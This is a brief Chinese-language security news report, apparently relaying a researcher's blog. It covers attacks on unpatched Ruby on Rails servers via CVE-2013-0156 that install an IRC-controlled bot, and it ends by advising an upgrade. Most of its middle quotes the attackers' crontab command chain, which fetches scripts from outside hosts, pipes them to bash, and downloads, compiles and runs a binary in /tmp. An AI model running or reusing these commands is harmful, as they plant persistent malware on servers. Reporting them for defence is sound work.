安全专家Jarmoc在博客中称,过去几天,一些基于Rails的Web应用程序和服务器遭到了攻击,攻击者成功入侵后,会在服务器上安装一个机器人,以接受来自IRC频道的进一步指示。
攻击者利用的是CVE-2013-0156这个安全漏洞,尽管Rails团队已经在今年1月份修复了该漏洞,但目前还有大量的服务器未更新至最新的版本,使得攻击者有机可乘。
该漏洞存在于Action Pack模块的参数解析代码中,允许攻击者绕过认证系统,注入并执行任意SQL代码,或对Rails应用执行DoS攻击。新的Rails版本中已经修复了该漏洞。
攻击者试图在crontab中添加如下命令(现在该命令已不可用):
- crontab -r;
- echo \"1 * * * * wget -O - colkolduld.com/cmd1|bash;
- wget -O - lochjol.com/cmd2|bash;
- wget -O - ddos.cat.com/cmd3|bash;
- \"|crontab -;
- wget http://88.198.20.247/k.c -O /tmp/k.c;
- gcc -o /tmp/k /tmp/k.c;
- chmod +x /tmp/k;
- /tmp/k||wget http://88.198.20.247/k -O /tmp/k && chmod +x /tmp/k && /tmp/k
该命令执行后会下载名为cmd1、cmd2和cmd3的可执行文件,并下载一个名为k.c的C源码文件到/tmp目录中,使用系统的GCC编译执行。或许是为了防止编译失败,该条命令还将下载一个预编译的k版本。
Jarmoc在博客中公布了k.c的源码,感兴趣的开发者可点击这里。
目前最新的Rails版本为3.2.13、3.1.12和2.3.18,建议开发者尽快升级。
Via jarmoc